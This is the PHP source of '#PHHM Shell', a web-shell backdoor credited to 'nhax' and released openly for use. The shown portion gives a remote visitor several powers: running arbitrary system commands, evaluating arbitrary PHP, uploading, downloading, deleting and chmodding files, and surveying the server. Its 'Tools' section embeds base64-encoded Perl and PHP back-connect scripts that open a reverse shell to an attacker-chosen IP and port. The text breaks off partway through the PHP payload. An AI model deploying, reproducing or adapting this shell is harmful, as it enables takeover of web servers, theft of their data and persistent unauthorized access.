[ + ] #PHHM shell [ + ]

<?php
/*******************************************************************
 *******************************************************************
 ***                         #PHHM Shell                         ***
 ***                        Coded by nhax                        ***
 ***                     Fuck self-claimer !                     ***
 ***                          Cai Kacak                          ***
 ***                        <3 <3 <3 <3 <3                       ***
 *******************************************************************
 *******************************************************************/

//error_reporting(0);

if(isset($_GET['cwd'])){ $cwd = $_GET['cwd']; chdir($cwd); } else { $cwd = getcwd().DIRECTORY_SEPARATOR; chdir($cwd); }
if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
if(strtolower(substr(php_uname(),0,3)) == "win") $win = TRUE; else $win = FALSE;
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;

global $cwd;

function perintah($perintah) {
    $res = '';
    if (!empty($perintah)) {
    if(function_exists('exec')) { @exec($perintah,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($perintah); }
    elseif(function_exists('system')) { @ob_start(); @system($perintah); $res = @ob_get_contents(); @ob_end_clean(); }
    elseif(function_exists('passthru')) { @ob_start(); @passthru($perintah); $res = @ob_get_contents(); @ob_end_clean(); }
    elseif(@is_resource($f = @popen($perintah,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }
    else { $res = "Perintah() Disabled! :("; }
    }
    return $res;
}

function ukuran($file){
    if($size = filesize($file)){
        if($size <= 1024){
            return "$size b";
        } else {
            if($size <= 1024*1024){
                $size = round($size / 1024,2);
                return "$size kb";
            } elseif($size <= 1024*1024*1024){
                $size = round($size / 1024 / 1024,2);
                return "$size mb";
            } elseif($size <= 1024*1024*1024*1024){
                $size = round($size / 1024 / 1024 / 1024,2);
                return "$size gb";
            }
        }
    }
    else return "0 b";
}

function showstat($stat){
    if ($stat=="on") {
        return "<b><font style='color: lime'>ON</font></b>";
    } else {
        return "<b><font style='color: red'>OFF</font></b>";
    }
}

function testperl() { if (perintah('perl -h')) { return showstat("on"); } else { return showstat("off"); } }
function testfetch() { if(perintah('fetch --help')) { return showstat("on"); } else { return showstat("off"); } }
function testwget() { if (perintah('wget --help')) { return showstat("on"); } else { return showstat("off"); } }
function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } }
function testpostgresql() { if (function_exists('pg_connect')) { return showstat("on"); } else { return showstat("off"); } }
function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } }
function testcurl() { if (function_exists('curl_version')) { return showstat("on"); } else { return showstat("off"); } }
function testmysql() { if (function_exists('mysql_connect')) { return showstat("on"); } else { return showstat("off"); } }
function testpython() { if(perintah("python -h")){ return showstat("on"); } else { return showstat("off"); } }
function testgcc() { if(perintah("gcc -h")){ return showstat("on"); } else { return showstat("off"); } }

function b64wrt($file, $benda){
    if($fo = fopen($file, "w")){
        return (fwrite($fo, base64_decode($benda)) ? 1 : 0);
    } else {
        echo "Failed to open $file for writing <br />";
    }
}

if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on"){
    $quot = "<font style='color:red'>ON</font>";
} else {
    $quot = "<font style='color: lime'>OFF</font>";
}

if(isset($_GET['action']) && $_GET['action'] == "dl" && $_GET['file'] != ""){
    $file = $_GET['file'];
    $filez = file_get_contents($file);
    header("Content-type: application/octet-stream");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
    echo $filez;
    exit;
}

elseif(isset($_GET['action']) && $_GET['action'] == "dlgzip" && $_GET['file'] != ""){
    $file = $_GET['file'];
    $filez = gzencode(file_get_contents($file));
    header("Content-Type: application/x-gzip\n");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
    echo $filez;
    exit;
}

$bytes = disk_free_space(".");
$si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
$base = 1024;
$class = min((int)log($bytes , $base) , count($si_prefix) - 1);
$totalspace_bytes = disk_total_space(".");
$totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
$totalspace_bases = 1024;
$totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);

$totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
$freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';

if(!$win){
    if(!$user = rapih(perintah("whoami"))) $user = "";
    if(!$id = rapih(perintah("id"))) $id = "";
    $prompt = $user." \$ ";
} else {
    $user = get_current_user();
    $id = $user;
    $prompt = $user." &raquo;";
    $v = explode("\\", $_GET['cwd']);
    $v = $v[0];
    $letters = "";

    foreach (range("A","Z") as $letter){
        if (is_dir($letter.":\\")){
            $letters.= " <a href=\"?cwd=".$letter.":\\\">[ ";
            if ($letter.":" != $v){
                $letters .= $letter;
            } else {
                $letters.= $letter;
            }
            $letters.= " ]</a> ";
        }
    }
}

$cwds = explode(DIRECTORY_SEPARATOR,$cwd);
$cwdurl = "";

for($i = 0 ; $i < sizeof($cwds)-1 ; $i++){
    $pathz= "";
    for($j= 0 ; $j <= $i ; $j++){
        $pathz .= $cwds[$j].DIRECTORY_SEPARATOR;
    }
    $cwdurl .= "<a href=\"?cwd=".$pathz."\">".$cwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
}

if(isset($_POST['rename'])){
    $old = $_POST['oldname'];
    $new = $_POST['newname'];
    rename($cwd.$old,$cwd.$new);
    $file = $cwd.$new;
}

if(isset($_POST['chmod'])){
    $name = $_POST['name'];
    $value = $_POST['newvalue'];
    if (strlen($value)==3){
        $value = 0 . "" . $value;
    }
    chmod($cwd.$name,octdec($value));
    $file = $cwd.$name;
}

if(isset($_POST['chmod_folder'])){
    $name = $_POST['name'];
    $value = $_POST['newvalue'];
    if (strlen($value)==3){
        $value = 0 . "" . $value;
    }
    chmod($cwd.$name,octdec($value));
    $file = $cwd.$name;
}

function clearspace($text){
    return str_replace(" ","_",$text);
}
function rapih($text){
    return trim(str_replace("<br />","",$text));
}
function magicboom($text){
    if (!get_magic_quotes_gpc()) {
        return $text;
    }
    return stripslashes($text);
}

function filemanager(){

    global $cwd, $cwdurl, $letters, $win, $posix, $user;

    $files = array();
    $folders = array();

    if($op = @opendir(".")){
        while($re = readdir($op)){
            if(is_file($re)){
                $files[] = $re;
            } elseif(is_dir($re)){
                $folders[] = $re;
            }
        }
        @closedir($op);
    } else {
        die("Failed to opendir()\n</body>");
        @closedir($op);
    }

    sort($files);
    sort($folders);

    $path = explode(DIRECTORY_SEPARATOR, $cwd);
    $tree = sizeof($path);
    $parent = "";
    $buff = "";

    if($tree > 2){
        for($i=0;$i<$tree-2;$i++){
            $parent .= $path[$i].DIRECTORY_SEPARATOR;
        }
    } else {
        $parent = $cwd;
    }

    $buff .= "<span class=\"fileman\">\n".

             "<table width=\"100%\">\n".

             "<tr>\n".
             "  <th style=\"width: 25%;\">name</th>\n".
             "  <th style=\"width: 5%;\">size</th>\n".
             "  <th style=\"width: 10%;\">owner:group</th>\n".
             "  <th style=\"width: 10%;\">perms</th>\n".
             "  <th style=\"width: 10%;\">modified</th>\n".
             "  <th style=\"width: 16%;\">actions</th>\n".
             "</tr>\n";

    foreach($folders as $folder){

        if($folder == "."){

            if(!$win && $posix){
                $name = posix_getpwuid(fileowner($folder));
                $group = posix_getgrgid(filegroup($folder));
                $owner = $name['name']." : ".$group['name'];
            } else {
                $owner = $user;
            }

            $buff .= "<tr>\n".

                     "  <td style=\"padding-left: 1em;\"><a href=\"?cwd=".$cwd."\" title=\"CHDIR to Self\">".$folder."</a> &minus; ".(is_writable($cwd) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."</td>\n".
                     "  <td style=\"text-align: center;\">DIR</td>\n".
                     "  <td style=\"text-align: center;\">".$owner."</td>\n".
                     "  <td style=\"text-align: center;\">".get_perms($folder)."</td>\n".
                     "  <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($cwd))."</td>\n".

                     "  <td style=\"text-align: center;\">\n".
                     "      <span id=\"titik1\">\n".
                     "          <a href=\"?cwd=".$cwd."&amp;action=edit&amp;file=".$cwd."newfile.php\" title=\"new file\">new file</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>\n".
                     "          <form action=\"?\" method=\"get\" id=\"titik1_form\" style=\"display:none;margin:0;padding:0;\"> \n".
                     "              <input type=\"hidden\" name=\"cwd\" value=\"".$cwd."\">\n".
                     "              <input type=\"hidden\" name=\"action\" value=\"mkdir\">\n".
                     "              New folder: <input type=\"text\" name=\"folder\" placeholder=\"Folder Name\" class=\"kotak\">\n".
                     "              <input type=\"submit\" value=\"Go\" class=\"kotak\">\n".
                     "          </form>\n".
                     "      </span>\n".
                     "  </td>\n".

                     "</tr>";

        } elseif($folder == ".."){

            if(!$win && $posix){
                $name = posix_getpwuid(fileowner($folder));
                $group = posix_getgrgid(filegroup($folder));
                $owner = $name['name']." : ".$group['name'];
            } else {
                $owner = $user;
            }

            $buff .= "<tr>\n".
                     "  <td style=\"padding-left: 1em;\"><a href=\"?cwd=".$parent."\" title=\"CHDIR to ".$parent."\">".$folder."</a> &minus; ".(is_writable($parent) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."</td>\n".
                     "  <td style=\"text-align: center;\">DIR</td>\n".
                     "  <td style=\"text-align: center;\">".$owner."</td>\n".
                     "  <td style=\"text-align: center;\">".get_perms($folder)."</td>\n".
                     "  <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($folder))."</td>\n".
                     "  <td style=\"text-align: center;\">-</td>\n".
                     "</tr>";

        } else {

            if(!$win && $posix){
                $name = posix_getpwuid(fileowner($folder));
                $group = posix_getgrgid(filegroup($folder));
                $owner = $name['name']." : ".$group['name'];
            } else {
                $owner = $user;
            }

            $buff .= "<tr>\n".

                     "  <td style=\"padding-left: 1em;\">\n".
                     "      <a id=\"".clearspace($folder)."_link\" href=\"?cwd=".$cwd.$folder.DIRECTORY_SEPARATOR."\" title=\"CHDIR to ".$cwd.$folder.DIRECTORY_SEPARATOR."\">[ ".$folder." ]</a> &minus; ".(is_writable($cwd.$folder) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."\n".
                     "      <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($folder)."_form\" style=\"display:none; padding:0;margin:0;\">\n".
                     "          <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />\n".
                     "          <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />\n".
                     "          <input class=\"kotak\" type=\"submit\" name=\"rename\" value=\"rename\" />\n".
                     "          <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />\n".
                     "      </form>\n".
                     "  </td>\n".

                     "  <td style=\"text-align: center;\">DIR</td>\n".
                     "  <td style=\"text-align: center;\">".$owner."</td>\n".
                     "  <td style=\"text-align: center;\">\n".
                     "      <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($cwd.$folder)."</a>\n".
                     "      <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($folder)."_form3\" style=\"display:none; padding:0;margin:0;\"> \n".
                     "          <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> \n".
                     "          <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($cwd.$folder)), -4)."\" /> \n".
                     "          <input class=\"kotak\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />\n".
                     "          <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />\n".
                     "      </form>\n".
                     "  </td>\n".

                     "  <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($folder))."</td>\n".
                     "  <td style=\"text-align: center;\">\n".
                     "      <a href=\"?cwd=".$cwd."&amp;action=rmdir&amp;folder=".$cwd.$folder."\">delete</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>\n".
                     "  </td>\n".

                     "</tr>";
        }
    }

    foreach($files as $file){

        if(!$win && $posix){
            $name = posix_getpwuid(fileowner($file));
            $group = posix_getgrgid(filegroup($file));
            $owner = $name['name']." : ".$group['name'];
        } else {
            $owner = $user;
        }

        $buff .= "<tr>\n".

                 "  <td style=\"padding-left: 1em;\">\n".
                 "      <a id=\"".clearspace($file)."_link\" href=\"?cwd=".$cwd."&amp;action=view&file=".str_replace(" ", "+", $cwd.$file)."\" title=\"View file ".$file."\">".$file."</a> &minus; ".(is_writable($cwd.$file) ? "<span style=\"color: #0f0;\">WRITABLE</span>" : "<span style=\"color: #f00;\">NOT WRITABLE</span>")."\n".
                 "      <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($file)."_form\" style=\"display:none; padding:0;margin:0;\">\n".
                 "          <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />\n".
                 "          <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />\n".
                 "          <input class=\"kotak\" type=\"submit\" name=\"rename\" value=\"rename\" />\n".
                 "          <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />\n".
                 "      </form>\n".
                 "  </td>\n".

                 "  <td style=\"text-align: center;\">".ukuran($file)."</td>\n".
                 "  <td style=\"text-align: center;\">".$owner."</td>\n".

                 "  <td style=\"text-align: center;\">\n".
                 "      <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form3');\">".get_perms($cwd.$file)."</a>\n".
                 "      <form action=\"?cwd=".$cwd."\" method=\"post\" id=\"".clearspace($file)."_form3\" style=\"display:none; padding:0;margin:0;\"> \n".
                 "          <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> \n".
                 "          <input class=\"kotak\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($cwd.$file)), -4)."\" /> \n".
                 "          <input class=\"kotak\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /> \n".
                 "          <input class=\"kotak\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form3');\" />\n".
                 "      </form>\n".
                 "  </td>\n".

                 "  <td style=\"text-align: center;\">".@date("d-M-Y H:i",filemtime($file))."</td>\n".

                 "  <td style=\"text-align: center;\">\n".
                 "      <a href=\"?cwd=".$cwd."&amp;action=edit&amp;file=".str_replace(" ", "+", $cwd.$file)."\" title=\"Edit ".$cwd.$file."\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?cwd=".$cwd."&amp;action=del&amp;file=".$cwd.$file."\">delete</a> | <a href=\"?cwd=".$cwd."&amp;action=dl&amp;file=".$cwd.$file."\">download</a> (<a href=\"?cwd=".$cwd."&amp;action=dlgzip&amp;file=".$cwd.$file."\">gz</a>)\n".
                 "  </td>\n".

                 "</tr>";
    }

    $buff .= "</table>\n</span>";
    echo $buff;
}

function get_perms($file){
    if($mode=fileperms($file)){
        $perms = "";
        $perms .= ($mode & 00400) ? 'r' : '-';
        $perms .= ($mode & 00200) ? 'w' : '-';
        $perms .= ($mode & 00100) ? 'x' : '-';
        $perms .= ($mode & 00040) ? 'r' : '-';
        $perms .= ($mode & 00020) ? 'w' : '-';
        $perms .= ($mode & 00010) ? 'x' : '-';
        $perms .= ($mode & 00004) ? 'r' : '-';
        $perms .= ($mode & 00002) ? 'w' : '-';
        $perms .= ($mode & 00001) ? 'x' : '-';
        return $perms;
    }
    else return "??????????";
}
// folder2 //
/*if(is_writable($cwd)){
if(!is_dir($cwd.".PHHM_files")){ mkdir($cwd.".PHHM_files", 0777); }
if(!is_dir($cwd.".PHHM_files/sym")){ mkdir($cwd.".PHHM_files/sym", 0777); }
if(!is_dir($cwd.".PHHM_files/sym/perl")){ mkdir($cwd.".PHHM_files/sym/perl", 0777); }
if(!is_dir($cwd.".PHHM_files/sym/php")){ mkdir($cwd.".PHHM_files/sym/php", 0777); }
if(!is_dir($cwd.".PHHM_files/bc")){ mkdir($cwd.".PHHM_files/bc", 0777); }
}*/
?>
<!--
--------------------------------------------------------------------------
- Official release
- Coded by Cai@nhax based on b374k NEC v3
- Gua hanya reParse & fix & remove serba sedikit benda yang ada dalam ni
- 100% Credit to REAL coder
- Follow @0xCai
- "Majulah Hejes untuk negara"
-
- #PHHM #HEJES #GILA #HEMPAS
---------------------------------------------------------------------------
-->
<html>

    <head>
        <title>#PHHM Shell</title>
        <script type="text/javascript">
        function tukar(lama,baru){
            document.getElementById(lama).style.display = 'none';
            document.getElementById(baru).style.display = 'block';
        }
        </script>
        <link rel="icon" type="image/png" href="http://www.iconsdb.com/icons/preview/black/x-mark-4-xl.png" />
        <style>
            body { background: #000; color: #fff; font-family: Tahoma; font-size: 13px; padding-top: 1em; }
            body a { color: #f00; text-decoration: none; }
            * a:hover { text-decoration: underline; }
            footer { border-top: 0; position: fixed; left:0px; right:0px; bottom:0px; text-align: Right; font-family: Courier New; color: gray; }
            footer:hover { color: #fff; }
            fieldset { border-color: #fff; border-style: solid; border-radius: 3px; background: #111; }
            fieldset:hover { background: #101010; }
            #menu a { border: 1px solid #f00; color: #f00; padding: 5px; padding-left: 3em; padding-right: 3em; text-decoration: none; }
            #menu a:hover { border: 1px solid #fff; border-radius: 1px; color: #fff; }
            #menu a:active { border: 1px solid #0f0; color: #0f0; }
            .fileman { padding: 2px; }
            .fileman * { color: #f00; }
            .fileman table { border: 0; }
            .fileman tr:hover { background: #744F4F; }
            .fileman th { color: #fff; background: #111; }
            .fileman td,th { border: 1px solid #f00; font-family: Arial; font-size: 13px; padding: 2px; border-radius: 2px; }
            .fileman a { color: #2BA8EC; text-decoration: none; }
            .fileman a:hover,active { color: gray; }
            .kotak { border: 1px solid #f00; border-radius: 1px; padding: 1px; padding-left: 3px; padding-right: 3px; background: #111; font-family: Tahoma; color: #fff; }
            .kotak:active { box-shadow: 0px 0px 5px #f00; }
            h1.cantik { border: 1px solid #fff; border-radius: 3px; text-align: Center; font-family: Calibri; }
            #viewfile { background: #111; border: 1px solid #fff; border-radius: 3px; padding: 5px; }
        </style>
    </head>

    <body>

        <div id="menu" align="center">
            <a href="?" title="Main">Main</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=info" title="Info">Info</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=shell" title="Shell">Shell</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=upload" title="Uploader">Upload</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=eval" title="Eval PHP Codes">Eval PHP</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=phpinfo" title="PHP Info">PhpInfo</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=tools" title="Tools">Tools</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=jumping" title="Jumping">Jumping</a>
            <a href="?cwd=<?php echo $cwd; ?>&amp;action=sym_menu" title="Symlink: menu">Symlink</a>
            <br /><br />
        </div>

        <?php
        if($win){
            echo $cwdurl . " &minus; ". $letters;
        } else {
            echo $cwdurl;
        }

        echo "&minus; <a href=\"?cwd=".$_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR."\" title=\"Document Root\">[ Doc. Root ]</a><br /><hr color=\"red\"><br />";

        if(isset($_GET['action']) && $_GET['action'] == "info"){
            echo "<form action=\"?cwd=".$cwd."&amp;action=info\" method=\"post\">\n".

                 "<h1 class=\"cantik\">Server Info</h1>\n".

                 $_SERVER['SERVER_SOFTWARE'] . "<br />\n".
                 php_uname("a") . "<br />\n";

            if($posix) echo rapih(perintah("id")) . "<br />\n";
            elseif($win) echo rapih(perintah("whoami")) . "<br />\n";

            echo "Your IP: " . $_SERVER['REMOTE_ADDR'] . " | Server IP: " . $_SERVER['SERVER_ADDR'] . "<br />\n".
                 "Free " . $freespace_show . " of " . $totalspace_show . "<br />\n".
                 "Perl: ".testperl()." | Fetch: ".testfetch()." | WGet: ".testwget()." | cURL: ".testcurl()." | Oracle: ".testoracle()." | PostgreSQL: ".testpostgresql()." | MsSQL: ".testmssql()." | MySQL: ".testmysql()." | Python: ".testpython()." | GCC: ".testgcc()."<br />\n";

            if($safemode){
                echo "Safemode is <span style=\"color: red\">ON</span><br />\n";
            } else {
                echo "Safemode is <span style=\"color: lime\">OFF</span><br />\n";
            }

            echo "Magic Quotes is ".$quot."<br />";

            if(ini_get("disable_functions") == ""){
                echo $dsbf = "<span style=\"color: #0f0;\">NONE</span>";
            } else {
                echo $dsbf = "<span style=\"color: #f00;\">".ini_get("disable_functions")."</span>";
            }

            echo "</form>";
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "shell"){

            echo "<form action=\"?cwd=$cwd&amp;action=shell\" method=\"post\">\n".
                 "<h1 class=\"cantik\">CMD/Shell</h1>\n".
                 "<textarea cols=\"100\" rows=\"25\" name=\"out\" class=\"kotak\" readonly>\n";

            if(isset($_POST['submit'])){
                echo htmlspecialchars(perintah($_POST['cmd']));
            }

            echo "</textarea> <br />\n".
                 "<input type=\"text\" name=\"cmd\" style=\"width: 50%;\" placeholder=\"cmd\" class=\"kotak\">\n".
                 "<input type=\"submit\" name=\"submit\" class=\"kotak\">\n".
                 "</form>\n";

        }

        elseif(isset($_GET['action']) && $_GET['action'] == "upload"){

        echo "<form action=\"?cwd=$cwd&amp;action=upload\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\">\n".
             "  <h1 class=\"cantik\">File Uploader</h1>\n".
             "  File: <input type=\"file\" name=\"file\" class=\"kotak\" size=\"50\"> <br />\n".
             "  Path: <input type=\"text\" name=\"path\" value=\"$cwd\" style=\"width: 25%;\" class=\"kotak\"> <br />\n".
             "  <input type=\"submit\" name=\"submit\" value=\"upload file\" class=\"kotak\"> <br />\n".
             "</form>\n";

        if(isset($_POST['submit'])){
            if(is_uploaded_file($_FILES['file']['tmp_name'])){
                $pindah = magicboom($_POST['path']).$_FILES['file']['name'];
                if ($stat = move_uploaded_file($_FILES['file']['tmp_name'], $pindah)){
                    $msg = "file uploaded to <a href=\"?cwd=".$cwd."&action=view&file=".$pindah."\">".$pindah."</a>";
                } else {
                    $msg = "failed to upload ".$_FILES['file']['name'];
                }
            } else {
                $msg = "failed to upload ".$_FILES['file']['name'];
            }
            echo $msg;
            }

        }

        elseif(isset($_GET['action']) && $_GET['action'] == "phpinfo"){
            @ob_start();
            @eval("phpinfo();");
            $buff = @ob_get_contents();
            @ob_end_clean();
            $awal = strpos($buff,"<body>")+6;
            $akhir = strpos($buff,"</body>");
            echo "<h1 class=\"cantik\">PHP Info</h1>\n".
                 "<div class=\"fileman\">".substr($buff,$awal,$akhir-$awal)."</div>";
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "eval"){

            echo "<form action=\"?cwd=$cwd&amp;action=eval\" method=\"post\">\n".
                 "<h1 class=\"cantik\">Eval PHP codes</h1>\n".
                 "<textarea cols=\"100\" rows=\"25\" name=\"phpcode\" class=\"kotak\">\n";

            if(isset($_POST['submit'])){ echo htmlspecialchars(eval(magicboom($_POST['phpcode']))); }

            echo "</textarea>\n".
                 "<input type=\"submit\" name=\"submit\" value=\"execute php\" class=\"kotak\">\n".
                 "</form>\n";

        }

        elseif(isset($_GET['action']) && $_GET['action'] == "tools"){

            if(!$win && $posix){

                $bc = array(
                "pl" => "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7",
                "php" => "PD9waHANCnNldF90aW1lX2xpbWl0ICgwKTsNCmlmKFBIUF9TQVBJICE9ICJjbGkiKSBkaWUoIk5vdCBHVUkiKTsgDQppZigkYXJndiA8IDEpIGRpZSgiSW52YWxpZCIpOw0KJGlwID0gJGFyZ3ZbMV07ICRwb3J0ID0gJGFyZ3ZbMl07ICRjaHVua19zaXplID0gMTQwMDsgJHdyaXRlX2EgPSBudWxsOyAkZXJyb3JfYSA9IG51bGw7ICRzaGVsbCA9ICIvYmluL3NoIC1pIjsgJGRhZW1vbiA9IDA7ICRkZWJ1ZyA9IDA7DQppZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsNCiRwaWQgPSBwY250bF9mb3JrKCk7DQppZiAoJHBpZCA9PSAtMSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOyBleGl0KDEpOyB9DQppZiAoJHBpZCkgeyBleGl0KDApOyB9DQppZiAocG9zaXhfc2V0c2lkKCkgPT0gLTEpIHsgcHJpbnRpdCgiRXJyb3I6IENhbid0IHNldHNpZCgpIik7IGV4aXQoMSk7IH0NCiRkYWVtb24gPSAxOw0KfSBlbHNlIHsgcHJpbnRpdCgiV0FSTklORzogRmFpbGVkIHRvIGRhZW1vbmlzZS4gIFRoaXMgaXMgcXVpdGUgY29tbW9uIGFuZCBub3QgZmF0YWwuIik7IH0NCi8vY2hkaXIoIi8iKTsNCnVtYXNrKDApOw0KJHNvY2sgPSBmc29ja29wZW4oJGlwLCAkcG9ydCwgJGVycm5vLCAkZXJyc3RyLCAzMCk7DQppZiAoISRzb2NrKSB7IHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsgZXhpdCgxKTsgfQ0KJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoMCA9PiBhcnJheSgicGlwZSIsICJyIiksMSA9PiBhcnJheSgicGlwZSIsICJ3IiksMiA9PiBhcnJheSgicGlwZSIsICJ3IikpOw0KJHByb2Nlc3MgPSBwcm9jX29wZW4oJHNoZWxsLCAkZGVzY3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlKCRwcm9jZXNzKSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3Qgc3Bhd24gc2hlbGwiKTsgZXhpdCgxKTsgfQ0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMV0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7DQpwcmludGl0KCJTdWNjZXNzZnVsbHkgb3BlbmVkIHJldmVyc2Ugc2hlbGwgdG8gJGlwOiRwb3J0Iik7DQp3aGlsZSAoMSkgeyBpZiAoZmVvZigkc29jaykpIHsgcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOyBicmVhazsgfQ0KaWYgKGZlb2YoJHBpcGVzWzFdKSkgeyBwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7IGJyZWFrOyB9DQokcmVhZF9hID0gYXJyYXkoJHNvY2ssICRwaXBlc1sxXSwgJHBpcGVzWzJdKTsNCiRudW1fY2hhbmdlZF9zb2NrZXRzID0gc3RyZWFtX3NlbGVjdCgkcmVhZF9hLCAkd3JpdGVfYSwgJGVycm9yX2EsIG51bGwpOw0KaWYgKGluX2FycmF5KCRzb2NrLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLIFJFQUQiKTsgJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSzogJGlucHV0Iik7IGZ3cml0ZSgkcGlwZXNbMF0sICRpbnB1dCk7IH0NCmlmIChpbl9hcnJheSgkcGlwZXNbMV0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVCBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQ6ICRpbnB1dCIpOyBmd3JpdGUoJHNvY2ssICRpbnB1dCk7IH0NCmlmIChp